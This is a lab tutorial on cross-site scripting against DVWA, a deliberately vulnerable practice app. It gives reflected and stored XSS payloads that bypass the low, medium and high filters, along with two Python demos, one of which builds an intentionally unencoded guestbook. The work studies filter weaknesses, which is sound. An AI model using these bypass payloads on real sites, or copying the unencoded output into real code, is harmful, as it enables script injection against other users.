XSS Exploitation in DVWA (Bypass All Security)
In the previous tutorial I discussed cross-site scripting and the damage it can cause, and briefly explained the types of XSS vulnerability. In this tutorial you will learn how to exploit both types (stored and reflected) at all three DVWA security levels, bypassing the filter that each level applies to the input.
Reflected Cross Site Scripting
Set Security Low
Browse to the DVWA instance on localhost, log in as admin with the password password, and select the reflected cross site scripting entry from the list of vulnerabilities.
Start with a small script that opens an alert box. I will inject it through the text field provided for "name", whose value the server reflects straight back into the page.
<script>alert("helllooo")</script>
The browser executes the script and shows the alert prompt, as in the following screenshot.
At the low level the payload runs untouched: the developer performs no filtering on the "name" parameter at all, only a check that the field is not left empty.
Set Security Medium
At the medium level, click View Source and you will find that the highlighted code adds a layer of filtering to the value entered in the "name" field: it looks for the <script> tag in order to stop JavaScript from running.
str_replace: replaces all occurrences of the search string with the replacement string. Here the search string is <script> and the replacement is an empty string, so when an attacker injects a payload using the script tag, the opening <script> tag is removed and the rest of the input is reflected as plain text.
The check is case-sensitive: str_replace only matches the exact lower-case string <script>, so it can be bypassed with <SCRIPT>, or by using another HTML element that carries an event handler, which avoids the script tag entirely.
There are two ways, then: either use the <SCRIPT> tag or use any other HTML element. Here I have used the body tag with an onload handler to inject the string.
<body onload=alert("XSS")>
The above payload is injected successfully and medium security is bypassed. You can see from the screenshot that the XSS prompt opens via the body tag.
Set Security High
At the high level the filtering is stronger: viewing the source, you will find the PHP function preg_replace applied with a regular expression to disable JavaScript.
preg_replace: searches the string for matches to a pattern and replaces them with the replacement.
The <SCRIPT> trick from the medium level now fails, because the pattern matches the word script regardless of case (and is written so that characters inserted between its letters do not help) and deletes it from the input.
To bypass the high level, use an HTML element the filter does not touch. Here I have used an img tag whose src points at a non-existent image, so the onerror handler fires as soon as the page loads:
<img src=x onError=alert('xss')>
The screenshot below shows the XSS alert prompt.
Congrats! We have successfully bypassed all three security levels.
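To see why each payload above survives or dies at each level, here is a small Python re-implementation of the three filters applied to the "name" parameter, as an added example that is not code from the original page or from DVWA. The low and medium filters follow the tutorial's description exactly (no filtering; PHP str_replace of the literal <script>). The high pattern is my recollection of the regex in DVWA's high-level source and is an assumption of this example; if your DVWA version differs, paste its pattern into HIGH_PATTERN.

```python
import re

# Low: the input is echoed back unchanged.
# Medium: PHP str_replace('<script>', '', $name), an exact, case-sensitive match.
# High: PHP preg_replace with a case-insensitive pattern that deletes the word
#       "script" even when other characters are inserted between its letters.
#       The pattern below is reconstructed from memory of DVWA's high.php and
#       is an assumption of this example, not quoted from the tutorial.
HIGH_PATTERN = re.compile(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", re.IGNORECASE)


def filter_low(name: str) -> str:
    return name


def filter_medium(name: str) -> str:
    return name.replace("<script>", "")


def filter_high(name: str) -> str:
    return HIGH_PATTERN.sub("", name)


FILTERS = {"low": filter_low, "medium": filter_medium, "high": filter_high}

# The payloads used in the tutorial plus the upper-case variant it mentions.
PAYLOADS = {
    "script": '<script>alert("helllooo")</script>',
    "SCRIPT": '<SCRIPT>alert("helllooo")</SCRIPT>',
    "body": '<body onload=alert("XSS")>',
    "img": "<img src=x onError=alert('xss')>",
}


def render(level: str, name: str) -> str:
    """Server response for the reflected page: the filtered name is placed
    straight into HTML without encoding, exactly like DVWA's echo."""
    return "<pre>Hello " + FILTERS[level](name) + "</pre>"


def survives(level: str, payload: str) -> bool:
    """True when the filter leaves the payload untouched, i.e. the browser
    receives and executes it exactly as written."""
    return FILTERS[level](payload) == payload


def bypass_matrix() -> dict:
    """Which payloads reach the browser intact at each security level."""
    return {level: [tag for tag, p in PAYLOADS.items() if survives(level, p)]
            for level in FILTERS}


if __name__ == "__main__":
    for level, intact in bypass_matrix().items():
        print(f"{level:<7} intact: {', '.join(intact) or '(none)'}")
    print("medium on <script>:", repr(filter_medium(PAYLOADS["script"])))
    print("high on <SCRIPT>:  ", repr(filter_high(PAYLOADS["SCRIPT"])))
```

Running it shows the medium filter removing only the opening tag (the closing </script> is not the search string, so it stays) and the high filter swallowing both the lower- and upper-case script tags, while the body and img payloads pass every level because neither filter looks for anything but the word script. That is the whole lesson of the blacklist approach: it is the absence of output encoding, not the presence of a <script> tag, that makes the page exploitable.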
Stored Cross Site Scripting
Set Security Low
Again start with a small script that opens an alert box. This time I will inject it into the text area provided for the message, so that it is stored on the server.
<script>alert("helllooo")</script>
Now whenever a user visits this page to read our message, their browser executes the script and shows the alert prompt, as in the following screenshot.
Because the payload is stored permanently in the application's database, you need to reset the database (DVWA's Setup / Reset DB page) before moving on to the other two security levels.
Set Security Medium
If you remember, in the previous article we used the browser's Inspect Element to raise the maximum length of the message text area so that our script would fit. Repeat the same process for the "name" text field, which is where the payload goes at this level.
Change maxlength=10 to maxlength=100, which gives enough room for the payload. This limit is enforced only by the browser, not by the server.
Now type the following into the "name" text field:
<body onload=alert("XSS")>
Remember not to leave the message box empty; the server rejects the submission otherwise.
Now whenever a user visits this page to read our message, their browser executes the script and shows the alert prompt, as in the following screenshot.
Again, reset the database afterwards.
Set Security High
Repeat the same process to raise the maximum length of the "name" text field.
Change maxlength=10 to maxlength=100.
Now type the following into the "name" text field:
<img src=x onError=alert('xss')>
Remember not to leave the message box empty.
Congrats! We have successfully bypassed all three security levels.
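The stored procedure above rests on three facts: the maxlength attribute is enforced only by the browser, the server checks only that both fields are non-empty, and whatever is stored is served unencoded to every later visitor. The following toy guestbook, an added example written for this page rather than DVWA's own code, reproduces those three behaviours with Python's standard library and then drives it the way an attacker would, posting the form directly with a 26-character name. The form field names txtName and mtxMessage and the medium-level str_replace filter on the name field are assumptions modelled on DVWA; nothing here talks to a real DVWA instance.

```python
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# In-memory stand-in for DVWA's guestbook table: a list of (name, message).
GUESTBOOK = []
# Opener with proxies disabled so the loopback requests below never leave the host.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def medium_filter(name: str) -> str:
    """Medium-level filter on the name field as the tutorial describes it:
    PHP str_replace('<script>', '', $name), exact and case-sensitive."""
    return name.replace("<script>", "")


def render_page() -> str:
    """HTML every visitor receives. maxlength=10 on the name field is advice
    to the browser only; the server never sees it. Stored entries are written
    into the page unencoded on purpose, reproducing the vulnerable behaviour."""
    lines = ['<form method="post">',
             '<input name="txtName" maxlength="10">',          # assumed field name
             '<textarea name="mtxMessage"></textarea>',         # assumed field name
             '<input type="submit" value="Sign Guestbook"></form>']
    for name, message in GUESTBOOK:
        lines.append(f"<div>Name: {name}<br>Message: {message}</div>")
    return "\n".join(lines)


class GuestbookHandler(BaseHTTPRequestHandler):
    def log_message(self, *args):
        pass  # keep the demo quiet

    def _reply(self, html: str, status: int = 200):
        data = html.encode()
        self.send_response(status)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        self._reply(render_page())

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        name = form.get("txtName", [""])[0]
        message = form.get("mtxMessage", [""])[0]
        # The only server-side validation: neither field may be empty, which is
        # why the tutorial says not to leave the message box blank. Nothing
        # checks the length that maxlength=10 suggested to the browser.
        if not name.strip() or not message.strip():
            self._reply("Please fill in both fields", 400)
            return
        GUESTBOOK.append((medium_filter(name), message))
        self._reply(render_page())


def start_server() -> str:
    """Run the guestbook on a free loopback port and return its base URL."""
    server = HTTPServer(("127.0.0.1", 0), GuestbookHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{server.server_address[1]}/"


def sign(url: str, name: str, message: str) -> int:
    """POST the form directly, as a browser does once maxlength has been edited
    away in the inspector (or as curl does, never having seen it). Returns the
    HTTP status code."""
    data = urllib.parse.urlencode({"txtName": name, "mtxMessage": message}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        with OPENER.open(req) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def visit(url: str) -> str:
    """What any later visitor's browser downloads and renders."""
    with OPENER.open(url) as resp:
        return resp.read().decode()


def demo() -> dict:
    url = start_server()
    body_payload = '<body onload=alert("XSS")>'            # 26 chars, beyond maxlength=10
    script_payload = '<script>alert("helllooo")</script>'  # caught by str_replace
    results = {
        "empty_message_status": sign(url, body_payload, ""),
        "body_payload_status": sign(url, body_payload, "hello"),
        "script_payload_status": sign(url, script_payload, "hello"),
    }
    page = visit(url)
    results["body_payload_served"] = body_payload in page
    results["script_tag_stripped"] = ("<script>" not in page
                                      and 'alert("helllooo")</script>' in page)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The first submission is refused with 400 because the message is empty, exactly the mistake the tutorial warns about; the second is accepted despite the name being far longer than ten characters, and every subsequent GET carries the body payload verbatim to whoever reads the guestbook. The <script> submission shows the medium filter at work: only the opening tag is removed, the rest is stored and served as text.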
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, a social media lover and a gadgets enthusiast.
Source: www.hackingarticles.in